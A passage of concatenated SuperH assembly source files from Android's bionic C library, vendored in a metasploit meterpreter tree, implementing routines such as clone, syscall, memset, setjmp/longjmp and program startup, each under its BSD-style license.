add #-2,REG_SRC /* *--((unsigned short*)dst) = *--((unsigned short*)src); */
mov.w @REG_SRC,r0
add #-2,REG_LEN /* len -= 2; */
mov.w r0,@-REG_DST /* } */
1:
mov #3,r1
cmp/hi r1,REG_LEN /* while ( len > 3 ) { */
bf/s ov_no_align_delay
tst REG_LEN,REG_LEN
2:
add #-4,REG_SRC
mov.l @REG_SRC,r0 /* *((unsigned long*)dst)++ = *((unsigned long*)src)++; */
add #-4,REG_LEN /* len -= 4; */
cmp/hi r1,REG_LEN
bt/s 2b
mov.l r0,@-REG_DST /* } */
bra ov_no_align_delay
tst REG_LEN,REG_LEN
ov_word_align:
mov r1,r0
tst #1,r0
bf/s ov_no_align_delay
tst REG_LEN,REG_LEN /* if ( len == 0 ) return; */
bt bcopy_return
mov REG_SRC,r0 /* if ( src & 1 ) */
tst #1,r0
bt 1f
add #-1,REG_SRC
mov.b @REG_SRC,r0 /* *--dst = *--src; */
add #-1,REG_LEN
mov.b r0,@-REG_DST
1:
mov #1,r1
cmp/hi r1,REG_LEN /* while ( len > 1 ) { */
bf/s ov_no_align_delay
tst REG_LEN,REG_LEN
2:
add #-2,REG_SRC
mov.w @REG_SRC,r0 /* *--((unsigned short*)dst) = *--((unsigned short*)src); */
add #-2,REG_LEN /* len -= 2; */
cmp/hi r1,REG_LEN
bt/s 2b
mov.w r0,@-REG_DST /* } */
ov_no_align:
tst REG_LEN,REG_LEN /* while ( len!= ) { */
ov_no_align_delay:
bt 9f
1:
add #-1,REG_SRC
mov.b @REG_SRC,r0 /* *--dst = *--src; */
add #-1,REG_LEN /* len--; */
tst REG_LEN,REG_LEN
bf/s 1b
mov.b r0,@-REG_DST /* } */
9:
rts
#ifdef REG_DST0
mov REG_DST0,r0
#else
nop
#endif
|
OpenWireSec/metasploit | 2,492 | external/source/meterpreter/source/bionic/libc/arch-sh/bionic/clone.S | /*
* Copyright (C) 2009 The Android Open Source Project
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* * Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* * Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in
* the documentation and/or other materials provided with the
* distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
* "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
* LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
* FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
* COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
* BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
* OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED
* AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
* OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
* OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*/
#include <sys/linux-syscalls.h>
.text
.type __pthread_clone, @function
.globl __pthread_clone
.align 4
__pthread_clone:
/* insert the args onto the new stack */
mov r5, r0
mov.l r4, @-r0 /* func */
mov.l r7, @-r0 /* arg */
/* do the system call */
mov r6, r4 /* Set clone_flags. new sp is ready in r5. */
mov.l 0f, r3
trapa #(4 + 0x10)
/* check error */
cmp/pz r0
bf __error
/* check if parent or child */
cmp/pl r0
bt __return
/* prepare args for __thread_entry */
mov #8, r1
sub r1, r15 /* -8 */
mov.l @r15+, r5 /* +4 */ /* arg */
mov.l @r15+, r4 /* +4 */ /* func */
mov r15, r6 /* tls */
/* jump to __thread_entry */
mov.l 1f, r0
jmp @r0
nop
__error:
mov #-1, r0
__return:
rts
nop
.align 2
0: .long __NR_clone
1: .long __thread_entry
/* XXX: TODO: Add __bionic_clone here
* See bionic/bionic_clone.c and arch-arm/bionic/clone.S
* for more details...
*/ |
OpenWireSec/metasploit | 1,499 | external/source/meterpreter/source/bionic/libc/arch-sh/bionic/__get_sp.S | /*
* Copyright (C) 2009 The Android Open Source Project
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* * Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* * Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in
* the documentation and/or other materials provided with the
* distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
* "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
* LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
* FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
* COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
* BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
* OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED
* AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
* OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
* OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*/
.text
.type __get_sp, @function
.globl __get_sp
.align 4
__get_sp:
rts
mov r15, r0
|
OpenWireSec/metasploit | 1,572 | external/source/meterpreter/source/bionic/libc/arch-sh/bionic/crtend.S | /*
* Copyright (C) 2009 The Android Open Source Project
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* * Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* * Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in
* the documentation and/or other materials provided with the
* distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
* "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
* LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
* FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
* COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
* BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
* OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED
* AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
* OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
* OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*/
.section .preinit_array, "aw"
.long 0
.section .init_array, "aw"
.long 0
.section .fini_array, "aw"
.long 0
.section .ctors, "aw"
.long 0
|
OpenWireSec/metasploit | 2,128 | external/source/meterpreter/source/bionic/libc/arch-sh/bionic/_exit_with_stack_teardown.S | /*
* Copyright (C) 2009 The Android Open Source Project
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* * Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* * Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in
* the documentation and/or other materials provided with the
* distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
* "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
* LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
* FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
* COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
* BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
* OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED
* AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
* OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
* OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*/
#include <asm/unistd.h>
.text
.type _exit_with_stack_teardown, @function
.globl _exit_with_stack_teardown
.align 4
# void _exit_with_stack_teardown(void * stackBase, int stackSize, int retCode)
_exit_with_stack_teardown:
mov r6, r8 /* save retCode : breaks r8 value */
mov.l 0f, r3 /* system call number */
trapa #(2 + 0x10) /* invoke system call with num of args */
mov r8, r4 /* restore retCode */
mov.l 1f, r3 /* system call number */
trapa #(1 + 0x10) /* invoke system call with num of args */
/* exit() should never return, cause a crash if it does */
mov #0, r0
mov.l @r0, r0
.align 2
0: .long __NR_munmap
1: .long __NR_exit
|
OpenWireSec/metasploit | 3,069 | external/source/meterpreter/source/bionic/libc/arch-sh/bionic/crtbegin_dynamic.S | /*
* Copyright (C) 2009-2010 The Android Open Source Project
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* * Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* * Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in
* the documentation and/or other materials provided with the
* distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
* "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
* LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
* FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
* COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
* BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
* OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED
* AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
* OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
* OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*/
.text
.align 4
.type _start,#function
.globl _start
# this is the small startup code that is first run when
# any executable that is dynamically-linked with Bionic
# runs.
#
# it's purpose is to call __libc_init with appropriate
# arguments, which are:
#
# - the address of the raw data block setup by the Linux
# kernel ELF loader
#
# - address of an "onexit" function, not used on any
# platform supported by Bionic
#
# - address of the "main" function of the program. We
# can't hard-code it in the adr pseudo instruction
# so we use a tiny trampoline that will get relocated
# by the dynamic linker before this code runs
#
# - address of the constructor list
#
_start:
mov r15, r4
mov #0, r5
mov.l 0f, r6
mova 2f, r0
mov r0, r7
mov.l 1f, r0
jmp @r0
nop
.balign 4
0: .long main
1: .long __libc_init
2: .long __PREINIT_ARRAY__
.long __INIT_ARRAY__
.long __FINI_ARRAY__
.long __CTOR_LIST__
# the .ctors section contains a list of pointers to "constructor"
# functions that need to be called in order during C library initialization,
# just before the program is being run. This is a C++ requirement
#
# the last entry shall be 0, and is defined in crtend.S
#
.section .preinit_array, "aw"
.globl __PREINIT_ARRAY__
__PREINIT_ARRAY__:
.long -1
.section .init_array, "aw"
.globl __INIT_ARRAY__
__INIT_ARRAY__:
.long -1
.section .fini_array, "aw"
.globl __FINI_ARRAY__
__FINI_ARRAY__:
.long -1
.section .ctors, "aw"
.globl __CTOR_LIST__
__CTOR_LIST__:
.long -1
#include "__dso_handle.S"
|
OpenWireSec/metasploit | 1,506 | external/source/meterpreter/source/bionic/libc/arch-sh/bionic/__get_pc.S | /*
* Copyright (C) 2009 The Android Open Source Project
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* * Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* * Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in
* the documentation and/or other materials provided with the
* distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
* "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
* LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
* FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
* COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
* BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
* OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED
* AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
* OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
* OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*/
.text
.type __get_pc, @function
.globl __get_pc
.align 4
__get_pc:
mova 1f, r0
rts
1: nop
|
OpenWireSec/metasploit | 2,134 | external/source/meterpreter/source/bionic/libc/arch-sh/bionic/syscall.S | /*
* Copyright (C) 2009 The Android Open Source Project
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* * Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* * Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in
* the documentation and/or other materials provided with the
* distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
* "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
* LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
* FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
* COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
* BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
* OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED
* AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
* OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
* OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*/
#include <sys/linux-syscalls.h>
.text
.type syscall, @function
.globl syscall
.align 4
/*
* Current implementation assumes that the all syscall
* has maximum 7 arguments.
*/
syscall:
/* get args */
mov r4, r3 /* system call number */
mov r5, r4
mov r6, r5
mov r7, r6
mov.l @r15, r7
mov.l @(4, r15), r0
mov.l @(8, r15), r1
mov.l @(12, r15), r2
/* invoke trap */
trapa #(7 + 0x10) /* assuming 7 arguments */
/* check return value */
cmp/pz r0
bt end
/* keep error number */
mov.l r0, @-r15
mov.l 0f, r1
jsr @r1
mov r0, r4
mov.l @r15+, r0
end:
rts
nop
.align 2
0: .long __set_errno
|
OpenWireSec/metasploit | 6,921 | external/source/meterpreter/source/bionic/libc/arch-sh/bionic/memset.S | /* $OpenBSD: memset.S,v 1.1.1.1 2006/10/10 22:07:10 miod Exp $ */
/* $NetBSD: memset.S,v 1.1 2005/12/20 19:28:50 christos Exp $ */
/*-
* Copyright (c) 2002 SHIMIZU Ryo. All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
* 3. The name of the author may not be used to endorse or promote products
* derived from this software without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR
* IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
* OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
* IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT,
* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
* NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
* DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
* THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
* (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
* OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
#include <machine/asm.h>
#define REG_PTR r0
#define REG_TMP1 r1
#ifdef BZERO
# define REG_C r2
# define REG_DST r4
# define REG_LEN r5
#else
# define REG_DST0 r3
# define REG_DST r4
# define REG_C r5
# define REG_LEN r6
#endif
#ifdef BZERO
ENTRY(bzero)
#else
ENTRY(memset)
mov REG_DST,REG_DST0 /* for return value */
#endif
/* small amount to fill ? */
mov #28,REG_TMP1
cmp/hs REG_TMP1,REG_LEN /* if (len >= 28) goto large; */
bt/s large
mov #12,REG_TMP1 /* if (len >= 12) goto small; */
cmp/hs REG_TMP1,REG_LEN
bt/s small
#ifdef BZERO
mov #0,REG_C
#endif
/* very little fill (0 ~ 11 bytes) */
tst REG_LEN,REG_LEN
add REG_DST,REG_LEN
bt/s done
add #1,REG_DST
/* unroll 4 loops */
cmp/eq REG_DST,REG_LEN
1: mov.b REG_C,@-REG_LEN
bt/s done
cmp/eq REG_DST,REG_LEN
mov.b REG_C,@-REG_LEN
bt/s done
cmp/eq REG_DST,REG_LEN
mov.b REG_C,@-REG_LEN
bt/s done
cmp/eq REG_DST,REG_LEN
mov.b REG_C,@-REG_LEN
bf/s 1b
cmp/eq REG_DST,REG_LEN
done:
#ifdef BZERO
rts
nop
#else
rts
mov REG_DST0,r0
#endif
small:
mov REG_DST,r0
tst #1,r0
bt/s small_aligned
mov REG_DST,REG_TMP1
shll REG_LEN
mova 1f,r0 /* 1f must be 4bytes aligned! */
add #16,REG_TMP1 /* REG_TMP1 = dst+16; */
sub REG_LEN,r0
jmp @r0
mov REG_C,r0
.align 2
mov.b r0,@(15,REG_TMP1)
mov.b r0,@(14,REG_TMP1)
mov.b r0,@(13,REG_TMP1)
mov.b r0,@(12,REG_TMP1)
mov.b r0,@(11,REG_TMP1)
mov.b r0,@(10,REG_TMP1)
mov.b r0,@(9,REG_TMP1)
mov.b r0,@(8,REG_TMP1)
mov.b r0,@(7,REG_TMP1)
mov.b r0,@(6,REG_TMP1)
mov.b r0,@(5,REG_TMP1)
mov.b r0,@(4,REG_TMP1)
mov.b r0,@(3,REG_TMP1)
mov.b r0,@(2,REG_TMP1)
mov.b r0,@(1,REG_TMP1)
mov.b r0,@REG_TMP1
mov.b r0,@(15,REG_DST)
mov.b r0,@(14,REG_DST)
mov.b r0,@(13,REG_DST)
mov.b r0,@(12,REG_DST)
mov.b r0,@(11,REG_DST)
mov.b r0,@(10,REG_DST)
mov.b r0,@(9,REG_DST)
mov.b r0,@(8,REG_DST)
mov.b r0,@(7,REG_DST)
mov.b r0,@(6,REG_DST)
mov.b r0,@(5,REG_DST)
mov.b r0,@(4,REG_DST)
mov.b r0,@(3,REG_DST)
mov.b r0,@(2,REG_DST)
mov.b r0,@(1,REG_DST)
#ifdef BZERO
rts
1: mov.b r0,@REG_DST
#else
mov.b r0,@REG_DST
1: rts
mov REG_DST0,r0
#endif
/* 2 bytes aligned small fill */
small_aligned:
#ifndef BZERO
extu.b REG_C,REG_TMP1 /* REG_C = ??????xx, REG_TMP1 = ????00xx */
shll8 REG_C /* REG_C = ????xx00, REG_TMP1 = ????00xx */
or REG_TMP1,REG_C /* REG_C = ????xxxx */
#endif
mov REG_LEN,r0
tst #1,r0 /* len is aligned? */
bt/s 1f
add #-1,r0
mov.b REG_C,@(r0,REG_DST) /* fill last a byte */
mov r0,REG_LEN
1:
mova 1f,r0 /* 1f must be 4bytes aligned! */
sub REG_LEN,r0
jmp @r0
mov REG_C,r0
.align 2
mov.w r0,@(30,REG_DST)
mov.w r0,@(28,REG_DST)
mov.w r0,@(26,REG_DST)
mov.w r0,@(24,REG_DST)
mov.w r0,@(22,REG_DST)
mov.w r0,@(20,REG_DST)
mov.w r0,@(18,REG_DST)
mov.w r0,@(16,REG_DST)
mov.w r0,@(14,REG_DST)
mov.w r0,@(12,REG_DST)
mov.w r0,@(10,REG_DST)
mov.w r0,@(8,REG_DST)
mov.w r0,@(6,REG_DST)
mov.w r0,@(4,REG_DST)
mov.w r0,@(2,REG_DST)
#ifdef BZERO
rts
1: mov.w r0,@REG_DST
#else
mov.w r0,@REG_DST
1: rts
mov REG_DST0,r0
#endif
.align 2
large:
#ifdef BZERO
mov #0,REG_C
#else
extu.b REG_C,REG_TMP1 /* REG_C = ??????xx, REG_TMP1 = ????00xx */
shll8 REG_C /* REG_C = ????xx00, REG_TMP1 = ????00xx */
or REG_C,REG_TMP1 /* REG_C = ????xx00, REG_TMP1 = ????xxxx */
swap.w REG_TMP1,REG_C /* REG_C = xxxx????, REG_TMP1 = ????xxxx */
xtrct REG_TMP1,REG_C /* REG_C = xxxxxxxx */
#endif
mov #3,REG_TMP1
tst REG_TMP1,REG_DST
mov REG_DST,REG_PTR
bf/s unaligned_dst
add REG_LEN,REG_PTR /* REG_PTR = dst + len; */
tst REG_TMP1,REG_LEN
bf/s unaligned_len
aligned:
/* fill 32*n bytes */
mov #32,REG_TMP1
cmp/hi REG_LEN,REG_TMP1
bt 9f
.align 2
1: sub REG_TMP1,REG_PTR
mov.l REG_C,@REG_PTR
sub REG_TMP1,REG_LEN
mov.l REG_C,@(4,REG_PTR)
cmp/hi REG_LEN,REG_TMP1
mov.l REG_C,@(8,REG_PTR)
mov.l REG_C,@(12,REG_PTR)
mov.l REG_C,@(16,REG_PTR)
mov.l REG_C,@(20,REG_PTR)
mov.l REG_C,@(24,REG_PTR)
bf/s 1b
mov.l REG_C,@(28,REG_PTR)
9:
/* fill left 4*n bytes */
cmp/eq REG_DST,REG_PTR
bt 9f
add #4,REG_DST
cmp/eq REG_DST,REG_PTR
1: mov.l REG_C,@-REG_PTR
bt/s 9f
cmp/eq REG_DST,REG_PTR
mov.l REG_C,@-REG_PTR
bt/s 9f
cmp/eq REG_DST,REG_PTR
mov.l REG_C,@-REG_PTR
bt/s 9f
cmp/eq REG_DST,REG_PTR
mov.l REG_C,@-REG_PTR
bf/s 1b
cmp/eq REG_DST,REG_PTR
9:
#ifdef BZERO
rts
nop
#else
rts
mov REG_DST0,r0
#endif
unaligned_dst:
mov #1,REG_TMP1
tst REG_TMP1,REG_DST /* if (dst & 1) { */
add #1,REG_TMP1
bt/s 2f
tst REG_TMP1,REG_DST
mov.b REG_C,@REG_DST /* *dst++ = c; */
add #1,REG_DST
tst REG_TMP1,REG_DST
2: /* } */
/* if (dst & 2) { */
bt 4f
mov.w REG_C,@REG_DST /* *(u_int16_t*)dst++ = c; */
add #2,REG_DST
4: /* } */
tst #3,REG_PTR /* if (ptr & 3) { */
bt/s 4f /* */
unaligned_len:
tst #1,REG_PTR /* if (ptr & 1) { */
bt/s 2f
tst #2,REG_PTR
mov.b REG_C,@-REG_PTR /* --ptr = c; */
2: /* } */
/* if (ptr & 2) { */
bt 4f
mov.w REG_C,@-REG_PTR /* *--(u_int16_t*)ptr = c; */
4: /* } */
/* } */
mov REG_PTR,REG_LEN
bra aligned
sub REG_DST,REG_LEN
|
OpenWireSec/metasploit | 3,390 | external/source/meterpreter/source/bionic/libc/arch-sh/bionic/_setjmp.S | /* $OpenBSD: _setjmp.S,v 1.2 2007/03/02 06:11:54 miod Exp $ */
/* $NetBSD: _setjmp.S,v 1.7 2006/01/05 02:04:41 uwe Exp $ */
/*-
* Copyright (c) 1990 The Regents of the University of California.
* All rights reserved.
*
* This code is derived from software contributed to Berkeley by
* William Jolitz.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
* 3. Neither the name of the University nor the names of its contributors
* may be used to endorse or promote products derived from this software
* without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*
* from: @(#)_setjmp.s 5.1 (Berkeley) 4/23/90
*/
#include <machine/asm.h>
#include <machine/setjmp.h>
/*
* C library -- _setjmp, _longjmp
*
* _longjmp(a,v)
* will generate a "return(v)" from the last call to
* _setjmp(a)
* by restoring registers from the stack.
* The previous signal state is NOT restored.
*/
ENTRY(_setjmp)
xor r0, r0
#if defined(__SH4__) && !defined(__SH4_NOFPU__)
add #(_JBLEN * 4), r4
sts fpscr, r1
mov.l r1, @-r4
lds r0, fpscr
sts.l fpul, @-r4
fmov.s fr15, @-r4
fmov.s fr14, @-r4
fmov.s fr13, @-r4
fmov.s fr12, @-r4
frchg
fmov.s fr15, @-r4
fmov.s fr14, @-r4
fmov.s fr13, @-r4
fmov.s fr12, @-r4
lds r1, fpscr
#else
add #((_JBLEN - 10) * 4), r4
#endif
sts.l mach, @-r4
sts.l macl, @-r4
mov.l r15, @-r4
mov.l r14, @-r4
mov.l r13, @-r4
mov.l r12, @-r4
mov.l r11, @-r4
mov.l r10, @-r4
mov.l r9, @-r4
mov.l r8, @-r4
sts.l pr, @-r4
mov.l r0, @-r4 /* dummy signal mask */
rts
mov.l r0, @-r4 /* no saved signal mask */
SET_ENTRY_SIZE(_setjmp)
ENTRY(_longjmp)
add #8, r4
lds.l @r4+, pr
mov.l @r4+, r8
mov.l @r4+, r9
mov.l @r4+, r10
mov.l @r4+, r11
mov.l @r4+, r12
mov.l @r4+, r13
mov.l @r4+, r14
mov.l @r4+, r15
lds.l @r4+, macl
lds.l @r4+, mach
#if defined(__SH4__) && !defined(__SH4_NOFPU__)
xor r0, r0
lds r0, fpscr
frchg
fmov.s @r4+, fr12
fmov.s @r4+, fr13
fmov.s @r4+, fr14
fmov.s @r4+, fr15
frchg
fmov.s @r4+, fr12
fmov.s @r4+, fr13
fmov.s @r4+, fr14
fmov.s @r4+, fr15
lds.l @r4+, fpul
lds.l @r4+, fpscr
#endif
mov r5, r0
tst r0, r0
bf .L0
add #1, r0
.L0:
rts
nop
SET_ENTRY_SIZE(_longjmp)
|
OpenWireSec/metasploit | 1,953 | external/source/meterpreter/source/bionic/libc/arch-sh/bionic/pipe.S | /*
* Copyright (C) 2009 The Android Open Source Project
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* * Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* * Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in
* the documentation and/or other materials provided with the
* distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
